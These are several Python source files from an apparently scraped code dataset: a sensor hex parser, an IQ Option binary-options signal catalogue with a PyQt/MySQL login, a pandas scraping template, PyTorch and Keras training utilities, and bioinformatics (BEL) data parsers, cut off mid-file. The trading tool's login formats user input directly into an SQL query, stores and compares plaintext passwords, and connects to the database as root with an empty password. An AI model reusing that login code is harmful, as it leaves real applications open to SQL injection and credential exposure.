\t\"minute\": minute,\n \t\"second\":second,\n \t\"heart_rate\":heart_rate,\n \t\"temperature\":temperature,\n \t\"moving\":moving\n }\n \n return data\n \ndef parseRealTimeData(hexArray):\n print(hexArray)\n year = int(\"\".join(hexArray[2:4]), 16)\n month = int(hexArray[4], 16)\n day = int(hexArray[5], 16)\n hour = int(hexArray[6], 16)\n minute = int(hexArray[7], 16)\n second = int(hexArray[8], 16)\n heart_rate = int(hexArray[9], 16)\n temperature = float(int(\"\".join(hexArray[10:12]), 16) / 100)\n moving = int(hexArray[12], 16)\n \n data = {\n \t\"date_time\": datetime(year, month, day, hour, minute, second).strftime(\"%Y/%m/%d %H:%M:%S\"),\n \t\"heart_rate\":heart_rate,\n \t\"temperature\":temperature,\n \t\"moving\":moving\n }\n\n return data","sub_path":"legacy_code/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571208891","text":"from iqoptionapi.stable_api import IQ_Option\r\nfrom datetime import datetime, timedelta\r\nfrom colorama import init, Fore, Back\r\nfrom time import time\r\nimport sys, os, configparser\r\nimport numpy as np\r\nfrom PyQt5 import uic,QtWidgets\r\nimport pymysql\r\n\r\ndb_name = \"bot_iqoption\"\r\nhost_db = \"localhost\"\r\nuser_db = \"root\"\r\nsenha_db = \"\"\r\n\r\ndef login_user():\r\n \r\n \r\n email = login.lineLogin.text()\r\n senha = login.lineSenha.text()\r\n \r\n conexao = pymysql.connect(host = host_db, user = user_db, passwd = senha_db, db = db_name)\r\n cursor = conexao.cursor()\r\n \r\n try:\r\n cursor.execute(\"SELECT senha FROM usuarios WHERE email = '{}'\".format(email))\r\n senha_dbase = cursor.fetchall()\r\n conexao.commit()\r\n conexao.close()\r\n except:\r\n login.loginErrado.setText(\"Login errado!\")\r\n \r\n if senha == senha_dbase[0][0]:\r\n login.close()\r\n catalogador.show()\r\n else:\r\n login.loginErrado.setText(\"Login errado!\")\r\n\r\ndef login_iqoption():\r\n \r\n global API\r\n email_iq = catalogador.lineEmail.text()\r\n senha_iq = catalogador.lineSenha.text()\r\n API = IQ_Option(email_iq, senha_iq)\r\n print('Conectando....')\r\n \r\n API.connect()\r\n\r\n if API.check_connect():\r\n print(\"Conectado\")\r\n else:\r\n print(\"conectado\")\r\n \r\n# def Conexao():\r\n# print('Conectando....')\r\n \r\n# API.connect()\r\n\r\n# if API.check_connect():\r\n# print(\"Conectado\")\r\n# else:\r\n# print(\"conectado\")\r\n\r\ndef cataloga(par, dias, prct_call, prct_put, timeframe):\r\n data = []\r\n datas_testadas = []\r\n time_ = time()\r\n sair = False\r\n while sair == False:\r\n velas = API.get_candles(par, (timeframe * 60), 1000, time_)\r\n velas.reverse()\r\n for x in velas:\r\n if datetime.fromtimestamp(x['from']).strftime('%Y-%m-%d') not in datas_testadas:\r\n datas_testadas.append(datetime.fromtimestamp(x['from']).strftime('%Y-%m-%d'))\r\n\r\n if len(datas_testadas) <= dias:\r\n x.update({'cor': 'verde' if x['open'] < x['close'] else 'vermelha' if x['open'] > x['close'] else 'doji'})\r\n data.append(x)\r\n else:\r\n sair = True\r\n break\r\n\r\n time_ = int(velas[-1]['from'] - 1)\r\n\r\n analise = {}\r\n for velas in data:\r\n horario = datetime.fromtimestamp(velas['from']).strftime('%H:%M')\r\n if horario not in analise: analise.update({horario: {'verde': 0, 'vermelha': 0, 'doji': 0, '%': 0, 'dir': ''}})\r\n analise[horario][velas['cor']] += 1\r\n\r\n try:\r\n analise[horario]['%'] = round(100 * (analise[horario]['verde'] / (analise[horario]['verde'] + analise[horario]['vermelha'] + analise[horario]['doji'])))\r\n except:\r\n pass\r\n\r\n for horario in analise:\r\n if analise[horario]['%'] > 50: analise[horario]['dir'] = 'CALL'\r\n if analise[horario]['%'] < 50: analise[horario]['%'], analise[horario]['dir'] = 100 - analise[horario]['%'], 'PUT '\r\n\r\n return analise\r\n\r\n\r\ndef Obter_Paridades():\r\n global API\r\n P = API.get_all_open_time()\r\n paridades = []\r\n pares = 'N'\r\n if pares == 'S':\r\n for pares in P['digital']:\r\n paridades.append(pares)\r\n for pares in P['turbo']:\r\n paridades.append(pares)\r\n else:\r\n for pares in P['digital']:\r\n if P['digital'][pares]['open'] == True:\r\n paridades.append(pares)\r\n for pares in P['turbo']:\r\n if P['turbo'][pares]['open'] == True:\r\n paridades.append(pares)\r\n\r\n return np.unique(paridades)\r\n\r\n\r\nprint('=========================================\\n| CATALOGADOR DE SINAIS |\\n=========================================')\r\ncheck_lista_config = \"S\"\r\narquivo_saida_config = \"lista.csv\"\r\narquivo_saida = arquivo_saida_config\r\ncheck_lista = check_lista_config\r\ntimeframe_config = \"5\"\r\ndias = int(30)\r\nporcentagem = int(100)\r\nmartingale = \"0\"\r\nprct_call = abs(porcentagem)\r\nprct_put = abs(100 - porcentagem)\r\nparidades = Obter_Paridades()\r\ndata = datetime.now().strftime('%Y-%m-%d')\r\nfor timeframe in timeframe_config:\r\n catalogacao = {}\r\n contador = 1\r\n for par in paridades:\r\n timer = int(time())\r\n print(f'{contador} - {Fore.GREEN}CATALOGANDO - {Fore.RESET} {Fore.BLUE}{par}{Fore.RESET} | TIMEFRAME {Fore.GREEN}M{timeframe}{Fore.RESET}...', end='')\r\n catalogacao.update({par: cataloga(par, dias, prct_call, prct_put, timeframe)})\r\n\r\n for par in catalogacao:\r\n for horario in sorted(catalogacao[par]):\r\n if martingale.strip() != '':\r\n\r\n mg_time = horario\r\n soma = {'verde': catalogacao[par][horario]['verde'], 'vermelha': catalogacao[par][horario]['vermelha'], 'doji': catalogacao[par][horario]['doji']}\r\n\r\n for i in range(int(martingale)):\r\n\r\n catalogacao[par][horario].update({'mg' + str(i + 1): {'verde': 0, 'vermelha': 0, 'doji': 0, '%': 0}})\r\n\r\n mg_time = str(datetime.strptime((datetime.now()).strftime('%Y-%m-%d ') + str(mg_time), '%Y-%m-%d %H:%M') + timedelta(minutes=timeframe))[11:-3]\r\n\r\n if mg_time in catalogacao[par]:\r\n catalogacao[par][horario]['mg' + str(i + 1)]['verde'] += catalogacao[par][mg_time]['verde'] + soma['verde']\r\n catalogacao[par][horario]['mg' + str(i + 1)]['vermelha'] += catalogacao[par][mg_time]['vermelha'] + soma['vermelha']\r\n catalogacao[par][horario]['mg' + str(i + 1)]['doji'] += catalogacao[par][mg_time]['doji'] + soma['doji']\r\n\r\n catalogacao[par][horario]['mg' + str(i + 1)]['%'] = round(100 * (catalogacao[par][horario]['mg' + str(i + 1)]['verde' if catalogacao[par][horario]['dir'] == 'CALL' else 'vermelha'] / (catalogacao[par][horario]['mg' + str(i + 1)]['verde'] + catalogacao[par][horario]['mg' + str(i + 1)]['vermelha'] + catalogacao[par][horario]['mg' + str(i + 1)]['doji'])))\r\n\r\n soma['verde'] += catalogacao[par][mg_time]['verde']\r\n soma['vermelha'] += catalogacao[par][mg_time]['vermelha']\r\n soma['doji'] += catalogacao[par][mg_time]['doji']\r\n else:\r\n catalogacao[par][horario]['mg' + str(i + 1)]['%'] = 0\r\n\r\n print('finalizado em ' + str(int(time()) - timer) + ' segundos')\r\n contador += 1\r\n\r\n print('\\n\\n')\r\n\r\n for par in catalogacao:\r\n for horario in sorted(catalogacao[par]):\r\n ok = False\r\n\r\n if catalogacao[par][horario]['%'] >= porcentagem:\r\n ok = True\r\n else:\r\n for i in range(int(martingale)):\r\n if catalogacao[par][horario]['mg' + str(i + 1)]['%'] >= porcentagem:\r\n ok = True\r\n break\r\n\r\n if ok == True:\r\n\r\n msg = Fore.YELLOW + par + Fore.RESET + ' - ' + horario + ' - ' + (Fore.RED if catalogacao[par][horario]['dir'] == 'PUT ' else Fore.GREEN) + catalogacao[par][horario]['dir'] + Fore.RESET + ' - ' + str(catalogacao[par][horario]['%']) + '% - ' + Back.GREEN + Fore.BLACK + str(catalogacao[par][horario]['verde']) + Back.RED + Fore.BLACK + str(catalogacao[par][horario]['vermelha']) + Back.RESET + Fore.RESET + str(catalogacao[par][horario]['doji'])\r\n\r\n if martingale.strip() != '':\r\n for i in range(int(martingale)):\r\n if str(catalogacao[par][horario]['mg' + str(i + 1)]['%']) != 'N/A':\r\n msg += ' | MG ' + str(i + 1) + ' - ' + str(catalogacao[par][horario]['mg' + str(i + 1)]['%']) + '% - ' + Back.GREEN + Fore.BLACK + str(catalogacao[par][horario]['mg' + str(i + 1)]['verde']) + Back.RED + Fore.BLACK + str(catalogacao[par][horario]['mg' + str(i + 1)]['vermelha']) + Back.RESET + Fore.RESET + str(catalogacao[par][horario]['mg' + str(i + 1)]['doji'])\r\n else:\r\n msg += ' | MG ' + str(i + 1) + ' - N/A - N/A'\r\n\r\n print(msg)\r\n direcao = catalogacao[par][horario]['dir'].strip()\r\n open(arquivo_saida, 'a').write('M' + str(timeframe) + ';' + par + ';' + horario + ';' + direcao + '\\n')\r\n if check_lista == 'S':\r\n open(str(arquivo_saida) + '-CHECK', 'a').write(f'{data} {str(horario) + \":00\"} {par} {direcao} {str(martingale) + \"GL\"} {str(timeframe) + \"TM\"}\\n')\r\n\r\napp = QtWidgets.QApplication([])\r\nlogin = uic.loadUi(\"login.ui\")\r\ncatalogador = uic.loadUi(\"catalogador.ui\")\r\nlogin.btnLogin.clicked.connect(login_user)\r\ncatalogador.btnLogin.clicked.connect(login_iqoption)\r\ncatalogador.btnLogin.clicked.connect(cataloga)\r\n\r\n\r\nlogin.show()\r\napp.exec()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"66198173","text":"# Dependancies\nimport pandas as pd\n\n# We can use the read_html function in Pandas \n# to automatically scrape any tabular data from a page.\n\n# URL of website to scrape\nurl = 'https://en.wikipedia.org/wiki/List_of_capitals_in_the_United_States'\n\n# Read HTML\ntables = pd.read_html(url)\ntables\n\n# What we get in return is a list of dataframes for any tabular data that Pandas found.\n# We can slice off any of those dataframes that we want using normal indexing.\n\n# Select first table as df\ndf = tables[0]\n\n# Establish columns\ndf.columns = ['State', 'Abr.', 'State-hood Rank', 'Capital', \n 'Capital Since', 'Area (sq-mi)', 'Municipal Population', 'Metropolitan', \n 'Metropolitan Population', 'Population Rank', 'Notes']\n# Display\ndf.head()\n\n# Cleanup of extra rows\ndf = df.iloc[2:]\ndf.head()\n\n# Set the index to the State column\ndf.set_index('State', inplace=True)\ndf.head()\n\n# That way we can display all info about a row\ndf.loc['Alabama']\n\n\n# Pandas also had a to_html method that we can use to generate HTML tables from DataFrames.\nhtml_table = df.to_html()\nhtml_table\n\n# You may have to strip unwanted newlines to clean up the table.\nhtml_table.replace('\\n', '')\n\n# You can also save the table directly to a file.\ndf.to_html('table.html')","sub_path":"Templates/Pandas/Pandas_web_scraping.py","file_name":"Pandas_web_scraping.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198841860","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport torch\nfrom torch.autograd import Variable\n\nfrom tokens import *\nfrom vocabulary import Vocabulary\n\n\ndef loadData(\n filename : str,\n word_vocab: Vocabulary,\n tag_vocab : Vocabulary,\n delimiter : str=\"/\",\n):\n words_list = []\n tags_list = []\n\n for line in open(filename, \"r\").readlines():\n \n words = []\n tags = []\n \n for chunk in line.rstrip().split(\" \"):\n chunk = chunk.split(delimiter)\n assert len(chunk) == 2\n\n words += [chunk[0]]\n tags += [chunk[1]]\n \n words_list += [words]\n tags_list += [tags]\n\n return words_list, tags_list\n\n\ndef fill(\n batch: list,\n lens : list,\n pad : int=-1,\n):\n len_max = max(lens)\n\n return [\n batch[i] + [pad] * (len_max - lens[i])\n for i in range(len(lens))\n ]\n\n\ndef getMask(lens: list):\n len_max = max(lens)\n \n return torch.ByteTensor(\n [\n [0] * lens[i] + [1] * (len_max - lens[i])\n for i in range(len(lens))\n ]\n )\n\n\ndef getMinibatch(\n batch_words: list,\n batch_tags : list,\n word_vocab : Vocabulary,\n char_vocab : Vocabulary,\n tag_vocab : Vocabulary,\n device : torch.device,\n):\n sorted_pairs = [\n [s, t]\n for s, t in sorted(\n [ [_s, _t] for _s, _t in zip(batch_words, batch_tags) ],\n key=lambda x: len(x[0]), reverse=True,\n )\n ]\n\n batch_words = [x[0] for x in sorted_pairs]\n batch_word_lens = [len(x) for x in batch_words]\n batch_tags = [x[1] for x in sorted_pairs] \n\n max_len_batch = max(batch_word_lens)\n batch_size = len(batch_words)\n\n _batch_chars = []\n batch_char_lens = []\n\n for j in range(max_len_batch):\n chars = []\n for i in range(batch_size):\n if j >= len(batch_words[i]):\n chars += [[char_vocab.w2i[EOS]]]\n else:\n chars += [char_vocab.toIds(list(batch_words[i][j]))]\n\n _batch_chars += [chars]\n batch_char_lens += [[len(c) for c in chars]]\n\n batch_words = [word_vocab.toIds(s) for s in batch_words]\n batch_tags = [tag_vocab.toTagIds(s) for s in batch_tags]\n\n batch_chars = []\n for c, l in zip(_batch_chars, batch_char_lens):\n batch_chars += [\n torch.LongTensor(\n fill(c, l, char_vocab.w2i[EOS])\n ).to(device)\n ]\n\n batch_words = torch.LongTensor(\n fill(\n batch_words,\n batch_word_lens,\n word_vocab.w2i[EOS],\n #word_vocab.w2i[PAD],\n )\n ).to(device)\n\n batch_tags = torch.LongTensor(\n fill(\n batch_tags,\n batch_word_lens,\n tag_vocab.t2i[STOP],\n )\n ).to(device)\n\n batch_word_mask = getMask(batch_word_lens).to(device)\n\n #return batch_words, batch_tags, batch_masks, batch_word_lens\n return batch_words, batch_word_lens, batch_word_mask, batch_chars, batch_char_lens, batch_tags\n\n\ndef getOrder(lens: list):\n lens = torch.LongTensor(lens)\n sorted_lens, order = torch.sort(lens, descending=True)\n return sorted_lens, order\n\n\ndef getOrderOrig(\n order: torch.LongTensor,\n):\n pairs = [\n (o1, o2)\n for o1, o2 in zip(order.tolist(), list(range(len(order))))\n ]\n pairs.sort(key=lambda x: x[0])\n\n order_orig = [o2 for o1, o2 in pairs]\n return torch.LongTensor(order_orig)\n\n\n\n","sub_path":"scripts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"440893940","text":"import tensorflow as tf\nkeras = tf.compat.v2.keras\n\ndef model(model_base, output_shape):\n model = keras.Sequential([\n model_base,\n keras.layers.Dropout(0.25),\n keras.layers.Flatten(),\n keras.layers.Dense(1024, activation='relu', kernel_initializer='glorot_uniform', bias_initializer='zeros', name='dense'),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(128, activation='relu', kernel_initializer='glorot_uniform', bias_initializer='zeros', name='embed'),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(output_shape, kernel_initializer='glorot_uniform', bias_initializer='zeros', name='logits'),\n keras.layers.Activation('softmax', name='preds'),\n ])\n\n model.layers[0].trainable = False\n\n return model\n\n\ndef trainable_top(model):\n model.layers[0].trainable = False\n for layer in model.layers[1:]:\n layer.trainable = True\n\n return model\n\n\ndef trainable_base_top(model, num_base_layers_to_train=4):\n for layer in model.layers[0].layers[:-num_base_layers_to_train]:\n layer.trainable = False\n\n for layer in model.layers[0].layers[-num_base_layers_to_train:]:\n layer.trainable = True\n\n for layer in model.layers[1:]:\n layer.trainable = True \n\n return model\n\n\ndef trainable(model):\n for layer in model.layers[0].layers:\n layer.trainable = True\n\n for layer in model.layers[1:]:\n layer.trainable = True \n\n return model\n\n\ndef train(\n model, \n datasource, \n datasource_size, \n epochs, \n batch_size, \n callbacks, \n verbose=1, \n val_datasource=None, \n val_datasource_size=None \n):\n ''' fine-tuning procedure\n '''\n validation_steps = val_datasource_size//batch_size if val_datasource_size else None\n\n if verbose:\n print('Training top only')\n model = trainable_top(model)\n model.compile(loss=model.loss, optimizer=model.optimizer, metrics=model.metrics)\n model.fit( \n x=datasource, \n validation_data=val_datasource,\n epochs=epochs//3, \n steps_per_epoch=datasource_size//batch_size, \n validation_steps=validation_steps,\n callbacks=callbacks,\n verbose=verbose,\n )\n if verbose:\n print('Training top and base top {} layers'.format(4))\n model = trainable_base_top(model, 4)\n model.compile(loss=model.loss, optimizer=model.optimizer, metrics=model.metrics)\n model.fit( \n x=datasource, \n validation_data=val_datasource,\n epochs=epochs//3, \n steps_per_epoch=datasource_size//batch_size, \n validation_steps=validation_steps,\n callbacks=callbacks,\n verbose=verbose,\n )\n if verbose:\n print('Training whole network')\n model = trainable(model)\n model.compile(loss=model.loss, optimizer=model.optimizer, metrics=model.metrics)\n model.fit( \n x=datasource, \n validation_data=val_datasource,\n epochs=epochs//3, \n steps_per_epoch=datasource_size//batch_size, \n validation_steps=validation_steps,\n callbacks=callbacks,\n verbose=verbose,\n )","sub_path":"models/classic.py","file_name":"classic.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"25342178","text":"# coding: utf-8\n\n'''\n parsers.py\n\n Contains parser objects constructed for various datasets that\n will be used to build the .belns, .beleq, and .belanno files.\n\n'''\n\nfrom common import gzip_to_text\nfrom lxml import etree\nimport os\nimport csv\nimport gzip\nimport urllib.request\nimport zipfile\nimport io\n\nclass Parser(object):\n def __init__(self, url):\n self.url = url\n self.verbose = False\n\n def is_verbose(self):\n self.verbose = True\n\n def parse():\n pass\n\n\nclass EntrezGeneInfoParser(Parser):\n resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/entrez-gene-ids-hmr.belns\"\"\"\n\n def __init__(self, url):\n super(EntrezGeneInfoParser, self).__init__(url)\n self.entrez_info = url\n\n def parse(self):\n\n # columns for an Entrez gene info dataset.\n entrez_info_headers = ['tax_id', 'GeneID', 'Symbol', 'LocusTag',\n 'Synonyms', 'dbXrefs', 'chromosome',\n 'map_location', 'description',\n 'type_of_gene',\n 'Symbol_from_nomenclature_authority',\n 'Full_name_from_nomenclature_authority',\n 'Nomenclature_status',\n 'Other_designations', 'Modification_date']\n\n # dictionary for base gene info\n info_csvr = csv.DictReader(gzip_to_text(self.entrez_info),\n delimiter='\\t',\n fieldnames=entrez_info_headers)\n\n for row in info_csvr:\n if row['tax_id'] in ('9606', '10090', '10116'):\n yield row\n\n def __str__(self):\n return \"EntrezGeneInfo_Parser\"\n\n\nclass EntrezGeneHistoryParser(Parser):\n resourceLocation = \"\"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/entrez-gene-ids-hmr.belns\"\"\"\n\n def __init__(self, url):\n super(EntrezGeneHistoryParser, self).__init__(url)\n self.entrez_history = url\n\n def parse(self):\n\n entrez_history_headers = [\"tax_id\", \"GeneID\", \"Discontinued_GeneID\",\n \"Discontinued_Symbol\", \"Discontinue_Date\"]\n\n # dictionary for base gene info\n history_csvr = csv.DictReader(gzip_to_text(self.entrez_history),\n delimiter='\\t',\n fieldnames=entrez_history_headers)\n\n for row in history_csvr:\n if row['tax_id'] in (\"9606\", \"10090\", \"10116\"):\n yield row\n\n def __str__(self):\n return \"EntrezGeneHistory_Parser\"\n\n\nclass HGNCParser(Parser):\n resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/hgnc-approved-symbols.belns\"\"\"\n\n def __init__(self, url):\n super(HGNCParser, self).__init__(url)\n self.hgnc_file = url\n\n def parse(self):\n\n # use iso-8859-1 as default encoding.\n with open(self.hgnc_file, \"r\", encoding=\"iso-8859-1\") as hgncf:\n\n # Note that HGNC uses TWO columns named the same thing for Entrez\n # Gene ID. Currently we are not using these columns and it is not a\n # big deal, but in the future we could account for this by using\n # custom headers (like EntrezGeneInfo_Parser), or resolving to the\n # SECOND of the Entrez Gene ID columns.\n hgnc_csvr = csv.DictReader(hgncf, delimiter='\\t')\n\n for row in hgnc_csvr:\n yield row\n\n def __str__(self):\n return \"HGNC_Parser\"\n\n\nclass MGIParser(Parser):\n resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/mgi-approved-symbols.belns\"\"\"\n\n def __init__(self, url):\n super(MGIParser, self).__init__(url)\n self.mgi_file = url\n\n def parse(self):\n with open(self.mgi_file, \"r\") as mgif:\n mgi_csvr = csv.DictReader(mgif, delimiter='\\t')\n\n for row in mgi_csvr:\n yield row\n\n def __str__(self):\n return \"MGI_Parser\"\n\n\nclass RGDParser(Parser):\n resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n namespace/rgd-approved-symbols.belns\"\"\"\n\n def __init__(self, url):\n super(RGDParser, self).__init__(url)\n self.rgd_file = url\n\n def parse(self):\n with open(self.rgd_file, \"r\") as rgdf:\n # skip all the comment lines beginning with '#' and also the header.\n rgd_csvr = csv.DictReader(filter(lambda row:\n not row[0].startswith('#'), rgdf),\n delimiter='\\t')\n\n for row in rgd_csvr:\n yield row\n\n def __str__(self):\n return \"RGD_Parser\"\n\n\n# This class exists mainly as a way to break the iteration loop during parsing\n# of the SwissProt dataset if needed.\nclass GeneTypeError(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\n\nclass SwissProtParser(Parser):\n resourceLocation_accession_numbers = \"\"\"http://resource.belframework.org/\n belframework/1.0/namespace/swissprot-accession-numbers.belns\"\"\"\n resourceLocation_entry_names = \"\"\"http://resource.belframework.org/\n belframework/1.0/namespace/swissprot-entry-names.belns\"\"\"\n\n def __init__(self, url):\n super(SwissProtParser, self).__init__(url)\n self.sprot_file = url\n self.entries = {}\n self.accession_numbers = {}\n self.gene_ids = {}\n self.tax_ids = {'9606', '10090', '10116'}\n self.pro = '{http://uniprot.org/uniprot}protein'\n self.rec_name = '{http://uniprot.org/uniprot}recommendedName'\n self.full_name = '{http://uniprot.org/uniprot}fullName'\n self.short_name = '{http://uniprot.org/uniprot}shortName'\n self.alt_name = '{http://uniprot.org/uniprot}alternativeName'\n self.db_ref = '{http://uniprot.org/uniprot}dbReference'\n self.organism = '{http://uniprot.org/uniprot}organism'\n self.entry = '{http://uniprot.org/uniprot}entry'\n self.accession = '{http://uniprot.org/uniprot}accession'\n self.name = '{http://uniprot.org/uniprot}name'\n\n def parse(self):\n\n with gzip.open(self.sprot_file) as sprotf:\n# with open(self.sprot_file, 'rb') as sprotf:\n ctx = etree.iterparse(sprotf, tag=self.entry)\n\n for ev, e in ctx:\n temp_dict = {}\n n_dict = {}\n\n # stop evaluating if this entry is not in the Swiss-Prot dataset\n if e.get('dataset') != 'Swiss-Prot':\n e.clear()\n continue\n\n # stop evaluating if this entry is not for human, mouse, or rat\n org = e.find(self.organism)\n\n # use a custom exception to break to next iteration (e)\n # if tax ref is not found.\n try:\n for org_child in org:\n if org_child.tag == self.db_ref:\n # restrict by NCBI Taxonomy reference\n if org_child.get('id') not in self.tax_ids:\n e.clear()\n raise GeneTypeError(org_child.get('id'))\n else:\n # add NCBI Taxonomy and the id for the entry\n # to the dict\n temp_dict[org_child.get('type')] = \\\n org_child.get('id')\n except GeneTypeError:\n continue\n\n # get entry name, add it to the dict\n entry_name = e.find(self.name).text\n temp_dict['name'] = entry_name\n\n # get protein data, add recommended full and short names to dict\n protein = e.find(self.pro)\n\n for child in protein.find(self.rec_name):\n if child.tag == self.full_name:\n temp_dict['recommendedFullName'] = child.text\n if child.tag == self.short_name:\n temp_dict['recommendedShortName'] = child.text\n alt_shortnames = []\n alt_fullnames = []\n\n protein = e.find(self.pro)\n for altName in protein.findall(self.alt_name):\n for child in altName:\n if child.tag == self.full_name:\n alt_fullnames.append(child.text)\n if child.tag == self.short_name:\n alt_shortnames.append(child.text)\n\n temp_dict['alternativeFullNames'] = alt_fullnames\n temp_dict['alternativeShortNames'] = alt_shortnames\n\n # get all accessions\n entry_accessions = []\n for entry_accession in e.findall(self.accession):\n acc = entry_accession.text\n entry_accessions.append(acc)\n if acc in self.accession_numbers:\n self.accession_numbers[acc] = None\n else:\n self.accession_numbers[acc] = 1\n\n # add the array of accessions to the dict\n temp_dict[\"accessions\"] = entry_accessions\n\n # add dbReference type (human, rat, and mouse) and gene ids to\n # the dict\n type_set = ['GeneId', 'MGI', 'HGNC', 'RGD']\n for dbr in e.findall(self.db_ref):\n if dbr.get('type') in type_set:\n gene_id = dbr.get('id')\n if dbr.get('type') not in n_dict:\n n_dict[dbr.get('type')] = [gene_id]\n else:\n n_dict[dbr.get('type')].append(gene_id)\n temp_dict['dbReference'] = n_dict\n\n # clear the tree before next iteration\n e.clear()\n while e.getprevious() is not None:\n del e.getparent()[0]\n\n yield temp_dict\n\n def __str__(self):\n return 'SwissProt_Parser'\n\n\n# Helper function for AffyParser. This will save each of the downloaded\n# URLs and return the file pointer.\ndef get_data(url):\n # from url, download and save file\n REQ = urllib.request.urlopen(url)\n file_name = url.split('/')[-1]\n os.chdir('datasets/')\n with open(file_name,'wb') as f:\n f.write(REQ.read())\n os.chdir('../')\n return file_name\n\ndef filter_plus_print(row):\n return not row.startswith('#')\n\n\nclass AffyParser(Parser):\n\n def __init__(self, url):\n super(AffyParser, self).__init__(url)\n self.affy_file = url\n\n def parse(self):\n\n # the arrays we are concerned with\n array_names = ['HG-U133A', 'HG-U133B', 'HG-U133_Plus_2', 'HG_U95Av2',\n 'MG_U74A', 'MG_U74B', 'MG_U74C', 'MOE430A', 'MOE430B',\n 'Mouse430A_2', 'Mouse430_2', 'RAE230A', 'RAE230B',\n 'Rat230_2']\n\n urls = []\n with open(self.affy_file, 'rb') as affyf:\n ctx = etree.iterparse(affyf, events=('start', 'end'))\n\n # This is probably not the best way to traverse this tree. Look at\n # the lxml.etree API more closely for possible implementations when\n # refactoring\n # NOTES - put some debugging in here to see how this is parsing,\n # may be a better way to parse (like using diff events).\n for ev, e in ctx:\n # iterate the Array elements\n for n in e.findall('Array'):\n name = n.get('name')\n if name in array_names:\n # iterate Annotation elements\n for child in n:\n if child.get('type') == 'Annot CSV':\n # iterate File elements\n for g_child in child:\n # get the URL and add to the list\n for gg_child in g_child:\n urls.append(gg_child.text)\n\n # iterate over the list of URLs returned from the Affy XML feed\n for link in urls:\n affy_reader = {}\n\n # get_data() downloads the file, saves it as a .csv.zip, and\n # returns a pointer to the file.\n n = get_data(link)\n z = zipfile.ZipFile('datasets/'+n, 'r')\n\n # only want the .csv from the archive (also contains a .txt)\n for name in z.namelist():\n if '.csv' in name:\n if self.verbose:\n print('\\tExtracting - ' +name)\n # wrap in a TextIOWrapper. otherwise it returns bytes.\n affy_reader = csv.DictReader(filter(lambda x:\n not x.startswith('#'),\n io.TextIOWrapper(z.open(name))),\n delimiter=',')\n\n for x in affy_reader:\n yield x\n\n def __str__(self):\n return 'Affy_Parser'\n\nclass Gene2AccParser(Parser):\n\n def __init__(self, url):\n super(Gene2AccParser, self).__init__(url)\n self.gene2acc_file = url\n\n def parse(self):\n\n # would like to have DictReader handle this, but need a way to\n # deal with the special case of the first value beginning with\n # a hashtag. i.e. #Format: <-- is NOT a column header.\n column_headers = ['tax_id', 'GeneID', 'status',\n 'RNA nucleotide accession.version',\n 'RNA nucleotide gi', 'protein accession.version',\n 'protein gi', 'genomic nucleotide accession.version',\n 'genomic nucleotide gi',\n 'start position on the genomic accession',\n 'end position on the genomic accession',\n 'orientation', 'assembly',\n 'mature peptide accession.version',\n 'mature peptide gi', 'Symbol']\n\n g2a_reader = csv.DictReader(gzip_to_text(self.gene2acc_file), delimiter='\\t',\n fieldnames=column_headers)\n\n for row in g2a_reader:\n yield row\n\n def __str__(self):\n return 'Gene2Acc_Parser'\n\nclass BELNamespaceParser(Parser):\n\n def __init__(self):\n self.old_files = 'http://resource.belframework.org./belframework/1.0/index.xml'\n self.anno_def = '{http://www.belscript.org/schema/annotationdefinitions}annotationdefinitions'\n self.namespace = '{http://www.belscript.org/schema/namespace}namespace'\n self.namespaces = '{http://www.belscript.org/schema/namespaces}namespaces'\n\n def parse(self):\n\n tree = etree.parse(self.old_files)\n\n # xpath will return all elements under this namespace (list of bel namespace urls)\n urls = tree.xpath('//*[local-name()=\"namespace\"]/@idx:resourceLocation',\n namespaces={'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'idx' : 'http://www.belscript.org/schema/index'})\n\n for url in urls:\n yield url\n\n def __str__(self):\n return 'BELNamespace_Parser'\n\n\nclass BELEquivalenceParser(Parser):\n\n def __init__(self):\n self.old_files = 'http://resource.belframework.org./belframework/1.0/index.xml'\n self.anno_def = '{http://www.belscript.org/schema/annotationdefinitions}annotationdefinitions'\n self.namespace = '{http://www.belscript.org/schema/namespace}namespace'\n self.namespaces = '{http://www.belscript.org/schema/namespaces}namespaces'\n\n def parse(self):\n\n tree = etree.parse(self.old_files)\n\n # xpath will return all elements under this namespace (list of bel equivalence urls)\n urls = tree.xpath('//*[local-name()=\"equivalence\"]/@idx:resourceLocation',\n namespaces={'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'idx' : 'http://www.belscript.org/schema/index'})\n\n for url in urls:\n yield url\n\n def __str__(self):\n return 'BELEquivalence_Parser'\n\n\nclass BELAnnotationsParser(Parser):\n\n def __init__(self):\n self.old_files = 'http://resource.belframework.org./belframework/1.0/index.xml'\n\n def parse(self):\n\n tree = etree.parse(self.old_files)\n\n # xpath will return all elements under this namespace (list of bel equivalence urls)\n urls = tree.xpath('//*[local-name()=\"annotationdefinition\"]/@idx:resourceLocation',\n namespaces={'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'idx' : 'http://www.belscript.org/schema/index'})\n\n for url in urls:\n yield url\n\n def __str__(self):\n return 'BELAnnotations_Parser'\n\n# This one uses iterparse(), much faster than xpath on the\n# bigger .owl file.\nclass CHEBIParser(Parser):\n\n def 